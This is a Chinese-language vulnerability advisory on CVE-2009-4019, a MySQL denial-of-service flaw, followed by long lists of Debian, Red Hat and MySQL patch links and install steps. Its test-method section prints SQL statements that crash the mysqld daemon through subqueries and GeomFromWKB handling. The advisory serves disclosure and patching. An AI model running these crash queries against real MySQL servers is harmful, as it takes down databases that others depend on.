安全研究
安全漏洞
MySQL SELECT语句处理拒绝服务漏洞
发布日期:2009-11-19
更新日期:2009-12-01
受影响系统:
MySQL AB MySQL 5.1.x不受影响系统:
MySQL AB MySQL 5.0.x
MySQL AB MySQL 5.1.41描述:
MySQL AB MySQL 5.0.88
BUGTRAQ ID: 37297
CVE ID: CVE-2009-4019
MySQL是一款使用非常广泛的开放源代码关系数据库系统,拥有各种平台的运行版本。
MySQL的mysqld守护程序没有正确地处理在执行某些带有子查询的SELECT语句期间所产生的错误,在执行使用GeomFromWKB函数的语句期间没有保留某些null_value标记,这允许通过认证的远程攻击者通过提交特制语句导致守护程序崩溃。
<*来源:Shane Bester
链接:http://secunia.com/advisories/37372/
http://bugs.mysql.com/bug.php?id=48291
http://bugs.mysql.com/bug.php?id=47780
http://bugs.mysql.com/bug.php?id=47780
https://www.redhat.com/support/errata/RHSA-2010-0109.html
http://www.debian.org/security/2010/dsa-1997
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
create table `t1`(`a` float);
insert into `t1` values (-2),(-1);
select 1 from `t1`
where
`a` <> '1' and not
row(`a`,`a`) <=>
row((select 1 from `t1` where 1=2),(select 1 from `t1`))
into @`var0`;
drop table if exists `t1`;
create table `t1`(`c0` bigint,`c3` multipolygon);
insert into `t1` values
(0,geomfromtext('multipolygon(((1 2,3 4,5 6,7 8,9 8),(7 6,5 4,3 2,1 2,3 4)))'));
select 1 from `t1` where
`c0` <> (select geometrycollectionfromwkb(`c3`) from `t1`);
建议:
厂商补丁:
Debian
------
Debian已经为此发布了一个安全公告(DSA-1997-1)以及相应补丁:
DSA-1997-1:New mysql-dfsg-5.0 packages fix several
链接:http://www.debian.org/security/2010/dsa-1997
补丁下载:
Source archives:
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.dsc
Size/MD5 checksum: 1128 4887f5693757fbbc2584e86ab5e91bf3
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32-7etch12.diff.gz
Size/MD5 checksum: 315292 3d1c00f7b70032c11803fa391bee026a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.32.orig.tar.gz
Size/MD5 checksum: 16439441 f99df050b0b847adf7702b44e79ac877
Architecture independent packages:
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.32-7etch12_all.deb
Size/MD5 checksum: 48912 f937a118691e4325dac3a5a8e98eeb50
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.32-7etch12_all.deb
Size/MD5 checksum: 55892 6f34fbec1b8e451172ebd24f80439a9e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.32-7etch12_all.deb
Size/MD5 checksum: 46842 daa1649e464ebdbbd54170fb571782ea
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_alpha.deb
Size/MD5 checksum: 1947910 6e23852721ab3b2a95d1b3113a533212
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_alpha.deb
Size/MD5 checksum: 48900 c53c847af88a0423a09b9f68ba261859
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_alpha.deb
Size/MD5 checksum: 8906528 64427684814af516902d10adb5c85de2
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_alpha.deb
Size/MD5 checksum: 8406242 204adae2eab5bfb665728ea7257631f0
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_alpha.deb
Size/MD5 checksum: 27248640 ee4b566619b0e560dcbf0632f8b0cc0e
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_amd64.deb
Size/MD5 checksum: 1832552 84dba4bf6dfb24e13f4077e04d0c3475
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_amd64.deb
Size/MD5 checksum: 25812188 31a0ce355b2c04ac098cf88594903744
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_amd64.deb
Size/MD5 checksum: 48892 7af6aaca5c209bc9035be7d70784e9cb
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_amd64.deb
Size/MD5 checksum: 7549932 60e9a964ad08a8da5b2ea3f9102bead7
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_amd64.deb
Size/MD5 checksum: 7373492 bcf1f20eb6e6a973348a70628b1f4c4c
arm architecture (ARM)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_arm.deb
Size/MD5 checksum: 1749396 bdd8b56e6fcd449a95fa84557be2a36c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_arm.deb
Size/MD5 checksum: 48944 a1eefc9dc4f1b06dc273e3a9e8bb15b0
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_arm.deb
Size/MD5 checksum: 25391008 274f4ba0bc48cbaad699d13f18d890ed
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_arm.deb
Size/MD5 checksum: 7209164 361da5227a960f85c4ff9e7940e0c48c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_arm.deb
Size/MD5 checksum: 6929398 7dd6fa8d51380dbd14733d9a412a22ed
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_hppa.deb
Size/MD5 checksum: 8054922 1f896596ed2155bbb303170d5c58c52b
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_hppa.deb
Size/MD5 checksum: 48944 a588f3af5d0ff21ab4b40c81d1e6fc6c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_hppa.deb
Size/MD5 checksum: 27197414 0d83d649dc99199513a1db73707f24f6
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_hppa.deb
Size/MD5 checksum: 1923360 1cb59886260894b0d22f2a51a192de50
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_hppa.deb
Size/MD5 checksum: 8008532 93aaf8278a886dcba497aa9e2bb6293e
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_i386.deb
Size/MD5 checksum: 1795330 545b9a1f38f32aabacec4a5269e0aef4
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_i386.deb
Size/MD5 checksum: 7193656 1755e4d988b95b31afdac22af89b8336
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_i386.deb
Size/MD5 checksum: 48944 6f8c556248dfb80e251bb4985b266a8a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_i386.deb
Size/MD5 checksum: 25359554 03d2005576588e2c02274fcffe42d955
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_i386.deb
Size/MD5 checksum: 6976660 97d2e827f13ed9d35fce8467ca2b9efa
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_ia64.deb
Size/MD5 checksum: 9740464 ab1ab10891736c731e456a3b177a2312
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_ia64.deb
Size/MD5 checksum: 10344966 66e944be1b43f145243c27f57850d196
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_ia64.deb
Size/MD5 checksum: 48896 57f5afd3c27d68ba80a8739c5604095c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_ia64.deb
Size/MD5 checksum: 30405338 3dda87502fa124a4a5d5005c81e738c4
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_ia64.deb
Size/MD5 checksum: 2116718 da6a3ae401c77062478f2fd020435d29
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_mipsel.deb
Size/MD5 checksum: 25849668 0c94d38f290a9ed10a2edbe5ea3e741b
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_mipsel.deb
Size/MD5 checksum: 48902 0c47a91385eef6956f214bfb22ed1b48
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_mipsel.deb
Size/MD5 checksum: 7643768 e2b5b36f68cef57f9311723496b159b0
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_mipsel.deb
Size/MD5 checksum: 7565666 08d656eaee1e93290058e63f90b11fd6
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_mipsel.deb
Size/MD5 checksum: 1790838 5a763673b2f69c5c7b99093f83dca05e
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_powerpc.deb
Size/MD5 checksum: 7526456 177c37f69f3b0ac0b0190a1f6b30974d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_powerpc.deb
Size/MD5 checksum: 48952 4043f7b2094834103a474398a8662dcc
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_powerpc.deb
Size/MD5 checksum: 26316574 fb4938e1a2d923c61e4a7d022fd09453
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_powerpc.deb
Size/MD5 checksum: 7572330 24a85e6c00e7706cd0d86be06aa2b4df
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_powerpc.deb
Size/MD5 checksum: 1832552 fe2b6a7aa7655f4dd3533256e1d6c1cd
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.32-7etch12_sparc.deb
Size/MD5 checksum: 7016770 3e210b7a8f29c3249debffb84925cccb
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.32-7etch12_sparc.deb
Size/MD5 checksum: 25549876 c93a3c01ad19a0c1ee67f2735d27ddf2
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-4.1_5.0.32-7etch12_sparc.deb
Size/MD5 checksum: 48892 17f1009dbde6d24660ece46896a4e3c7
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.32-7etch12_sparc.deb
Size/MD5 checksum: 7162030 5dcf1cdc5747381a87d983ffd785131e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.32-7etch12_sparc.deb
Size/MD5 checksum: 1798414 c2a754cb9699ed08630984d32a0e0681
Debian (stable)
- ---------------
Stable updates are available for alpha, amd64, arm, armel, hppa, i386, ia64, mips, mipsel, powerpc, s390 and sparc.
Source archives:
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-24+lenny3.dsc
Size/MD5 checksum: 1746 e2f47c4a8b255f1ecebfca3416a9bd06
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a.orig.tar.gz
Size/MD5 checksum: 17946664 6fae978908ad5eb790fa3f24f16dadba
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-dfsg-5.0_5.0.51a-24+lenny3.diff.gz
Size/MD5 checksum: 379840 3383e2cd99f1a1108d9afc942ada9234
Architecture independent packages:
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-common_5.0.51a-24+lenny3_all.deb
Size/MD5 checksum: 61638 f95c22084e5fe701749eb775dcb72fca
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server_5.0.51a-24+lenny3_all.deb
Size/MD5 checksum: 55124 4ace4e9ed13e673babf77e095f732fc3
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client_5.0.51a-24+lenny3_all.deb
Size/MD5 checksum: 52928 9c459e3fd6a4d26d61ebd53c6ff59fc2
alpha architecture (DEC Alpha)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_alpha.deb
Size/MD5 checksum: 2017374 9cfa50e93ff4eb076c4b279db28590b2
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_alpha.deb
Size/MD5 checksum: 28323504 497b285f781bab661e872958db2706fa
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_alpha.deb
Size/MD5 checksum: 8921890 69a8ae8d4b8c65ba91ccd0f85c974eb3
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_alpha.deb
Size/MD5 checksum: 9069206 210e61b74049dd98ac2ac22d35cf87bf
amd64 architecture (AMD x86_64 (AMD64))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_amd64.deb
Size/MD5 checksum: 27159426 5969018772991a4d3ec674a892f3eca3
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_amd64.deb
Size/MD5 checksum: 8207634 de959e4ec57baeb625a1b787957f1b4e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_amd64.deb
Size/MD5 checksum: 7586020 5c3999c91d005b454e2b186c57d05532
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_amd64.deb
Size/MD5 checksum: 1905900 16f42105a813df0dc3ff86310bd617db
armel architecture (ARM EABI)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_armel.deb
Size/MD5 checksum: 26217720 8ac12229994f083d8d0fe61e7b21447c
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_armel.deb
Size/MD5 checksum: 7255210 1411c1f593184806f334c5115d5e5b1e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_armel.deb
Size/MD5 checksum: 1783326 4939777b25fdcf7d2dc5512cfe79e45a
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_armel.deb
Size/MD5 checksum: 7647988 0b5878b88bbbdccb50191c1624c9430e
hppa architecture (HP PA RISC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_hppa.deb
Size/MD5 checksum: 8429602 dd8e26cc1d2dc822570645ea76bb8c8e
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_hppa.deb
Size/MD5 checksum: 27882774 27f249a50e587c912e9c981257971c07
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_hppa.deb
Size/MD5 checksum: 8167562 758f37139ed34abcb8c6b73f481e7883
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_hppa.deb
Size/MD5 checksum: 1959060 6991ac7e53bc11c32f72a2fddb4bc7e1
i386 architecture (Intel ia32)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_i386.deb
Size/MD5 checksum: 7200822 2e2aaa0abb27d2704b40595faac5b483
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_i386.deb
Size/MD5 checksum: 1860538 f50bcc91b4aa22b2861cd9e7d672aa16
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_i386.deb
Size/MD5 checksum: 26654932 0bbb282a6496724b9113e84bb3af8d58
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_i386.deb
Size/MD5 checksum: 7785150 d0feb6f30b7aa4a8225ffd3e3fcb536f
ia64 architecture (Intel ia64)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_ia64.deb
Size/MD5 checksum: 2186408 287a20525b59ac1fd1f0164dabc01fde
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_ia64.deb
Size/MD5 checksum: 9933436 edd18fc5e20ed97d9b42b64427dde5a4
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_ia64.deb
Size/MD5 checksum: 10914030 9bd4e889ddf9d3794629bf3bd644e28d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_ia64.deb
Size/MD5 checksum: 31432284 5d78f5b72f7e105598c2ff77d3336986
mipsel architecture (MIPS (Little Endian))
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_mipsel.deb
Size/MD5 checksum: 7775656 b773580d6eb7f3c270394ae8bd46eb85
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_mipsel.deb
Size/MD5 checksum: 7721124 346332bf620a57af88f1495758b617fb
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_mipsel.deb
Size/MD5 checksum: 1810420 82c04ce1c097c08c17fff616a4507aa6
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_mipsel.deb
Size/MD5 checksum: 26332894 7dcba45bd26831928b7a7dc989ece59b
powerpc architecture (PowerPC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_powerpc.deb
Size/MD5 checksum: 1917890 a8181910ac284e74b82ac1f5bd0bf4af
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_powerpc.deb
Size/MD5 checksum: 7615402 f57057aab219c296febad2b1dbd71292
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_powerpc.deb
Size/MD5 checksum: 27312266 57d56f008e598595c89a87dd8fcfcd85
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_powerpc.deb
Size/MD5 checksum: 8161690 96b710801fade82a7a0d2cb11f5b1357
s390 architecture (IBM S/390)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_s390.deb
Size/MD5 checksum: 2031780 33ab4b2fb41707110c214ba7412e6b6d
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_s390.deb
Size/MD5 checksum: 8227402 9af8be2781006662773b51cfaa348db6
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_s390.deb
Size/MD5 checksum: 7698110 9e844e96ebac4a0256f219f7eb921b78
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_s390.deb
Size/MD5 checksum: 28104580 4a0ea6408ca35135353c26e4504f9233
sparc architecture (Sun SPARC/UltraSPARC)
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-server-5.0_5.0.51a-24+lenny3_sparc.deb
Size/MD5 checksum: 26813192 43180d48e10662a3f2f1bdef087a1c18
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15-dev_5.0.51a-24+lenny3_sparc.deb
Size/MD5 checksum: 7137808 a00a7b49b780235f55d9dcb80bda12b0
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/mysql-client-5.0_5.0.51a-24+lenny3_sparc.deb
Size/MD5 checksum: 7755776 22c7fd28be510233e2da5d61e56c8762
http://security.debian.org/pool/updates/main/m/mysql-dfsg-5.0/libmysqlclient15off_5.0.51a-24+lenny3_sparc.deb
Size/MD5 checksum: 1869120 342fc5e565b995da31edcf71797bd40e
补丁安装方法:
1. 手工安装补丁包:
首先,使用下面的命令来下载补丁软件:
# wget url (url是补丁下载链接地址)
然后,使用下面的命令来安装补丁:
# dpkg -i file.deb (file是相应的补丁名)
2. 使用apt-get自动安装补丁包:
首先,使用下面的命令更新内部数据库:
# apt-get update
然后,使用下面的命令安装更新软件包:
# apt-get upgrade
MySQL AB
--------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://lists.mysql.com/commits/88409
http://lists.mysql.com/commits/87482
RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0109-01)以及相应补丁:
RHSA-2010:0109-01:Moderate: mysql security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0109.html
浏览次数:6978
严重程度:0(网友投票)
绿盟科技给您安全的保障